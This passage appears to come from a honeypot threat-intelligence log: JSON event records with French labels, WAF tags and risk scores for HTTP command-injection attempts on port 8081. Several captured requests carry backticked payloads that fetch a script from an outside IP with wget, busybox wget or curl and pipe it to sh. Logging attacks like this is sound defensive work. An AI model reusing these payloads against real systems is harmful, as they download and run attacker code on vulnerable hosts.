85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 82, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/api\/tunnel\/tailscale-install\u0022, \u0022request_line\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/api\/tunnel\/tailscale-install\u0022, \u0022evidence_snippet\u0022: \u0022POST \/api\/tunnel\/tailscale-install HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json\\r\\nContent-Length: 176\\r\\nConnect\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 8 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022, \u0022http_cmd_injection\u0022, \u0022http_idor_probe\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_api\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022, \u0022http_cmd_injection\u0022, \u0022http_idor_probe\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_api\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":318},{"id":11809693,"ip":"45.153.34.252","ts":"2026-07-14 02:29:45.000000","proto":"tcp","src_port":38198,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":21,"waf_tags":"[\u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022]","http_method":"GET","http_target":"\/rc\/index.php?param=`cd","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022php\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u00226dbaa454161195a28db128c39bcd2e0b64509ea7\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 239, \u0022payload_entropy\u0022: 5.12176958038491, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 92.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 5.1, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 92.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 63, \u0022tag_count\u0022: 5, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u002296ffbc980fb7bc9b875941ff0dddf15e06bf28d1\u0022, \u0022event_fingerprint\u0022: \u002299809226ec9e708a5e2747dbf9d44e80b93316bf\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-14) \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 444, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0147\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0147\u0022], \u0022matched_patterns\u0022: [\u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0147\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022CRS 932206\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0147\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 92.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 63}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00225f1a1febb1cb04eecf03497d0593f529\u0022, \u0022path_pattern_hash\u0022: \u00229f01d15dbd2a6d5aaea97c773f4d76a0\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 63}, \u0022payload_preview\u0022: \u0022GET \/rc\/index.php?param=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s mdomo;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|s\u0022, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/rc\/index.php\u0022, \u0022query_string\u0022: \u0022param=`cd\u0022, \u0022waf_tags\u0022: [\u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-14\u0022, \u0022rce-0\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022GET \/rc\/index.php?param=`cd HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/rc\/index.php?param=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s mdomo;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s mdomo;curl http:\/\/91.92.40.118\/wget.sh|sh -s mdomo` HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022GET \/rc\/index.php?param=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s mdomo;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|s\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/rc\/index.php\u0022, \u0022query_string\u0022: \u0022param=`cd\u0022, \u0022waf_tags\u0022: [\u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-14\u0022, \u0022rce-0\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022GET \/rc\/index.php?param=`cd HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/rc\/index.php?param=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s mdomo;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s mdomo;curl http:\/\/91.92.40.118\/wget.sh|sh -s mdomo` HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022GET \/rc\/index.php?param=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s mdomo;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|s\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-14) \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00227c1633680b7d056c1e9d5f7cfc35af64f82e1663\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/rc\/index.php\u0022, \u0022request_line\u0022: \u0022GET \/rc\/index.php?param=`cd HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/rc\/index.php?param=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s mdomo;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|s\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/rc\/index.php\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-14) \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-14) \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 63\/100 (Moyen) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 92.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 63}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 63, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/rc\/index.php\u0022, \u0022request_line\u0022: \u0022GET \/rc\/index.php?param=`cd HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/rc\/index.php\u0022, \u0022evidence_snippet\u0022: \u0022GET \/rc\/index.php?param=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s mdomo;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|s\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 92 \u00b7 3 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"\/tmp;wget","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":239},{"id":11809689,"ip":"45.153.34.252","ts":"2026-07-14 02:29:44.000000","proto":"tcp","src_port":38194,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":13,"waf_tags":"[\u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022]","http_method":"GET","http_target":"\/cgi-bin\/downloadFlile.cgi?name=`cd","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u00229f0e4f18c073e4ffe78d136d9ca4bd9e19b9431b\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 251, \u0022payload_entropy\u0022: 5.112401661105647, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 60.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 5.8, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 60.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 54, \u0022tag_count\u0022: 7, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00221a7029184e048a4fe8e2dac81113e4e12560e3d5\u0022, \u0022event_fingerprint\u0022: \u002293905f00e3ddc85fe0605c76b1644a1bea7c5799\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 444, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0147\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0147\u0022], \u0022matched_patterns\u0022: [\u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0147\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022CRS 932206\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0147\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 60.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 54}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00223514ad6769e781a77f7106dc6faeb75f\u0022, \u0022path_pattern_hash\u0022: \u00221aae85e63b4d4e5c752317f5de257989\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 54}, \u0022payload_preview\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s toto5;busybox wget http:\/\/91.92.40.118\/w\u0022, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/cgi-bin\/downloadFlile.cgi\u0022, \u0022query_string\u0022: \u0022name=`cd\u0022, \u0022waf_tags\u0022: [\u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022rce-0\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=`cd HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s toto5;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s toto5;curl http:\/\/91.92.40.118\/wget.sh|sh -s toto5` HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s toto5;busybox wget http:\/\/91.92.40.118\/w\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/cgi-bin\/downloadFlile.cgi\u0022, \u0022query_string\u0022: \u0022name=`cd\u0022, \u0022waf_tags\u0022: [\u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022rce-0\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=`cd HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s toto5;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s toto5;curl http:\/\/91.92.40.118\/wget.sh|sh -s toto5` HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s toto5;busybox wget http:\/\/91.92.40.118\/w\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022eb7cb81a97bdd69575b87bbd6a0654e926f2943e\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/downloadFlile.cgi\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=`cd HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/downloadFlile.cgi?name=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s toto5;busybox wget http:\/\/91.92.40.118\/w\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/downloadFlile.cgi\u0022, 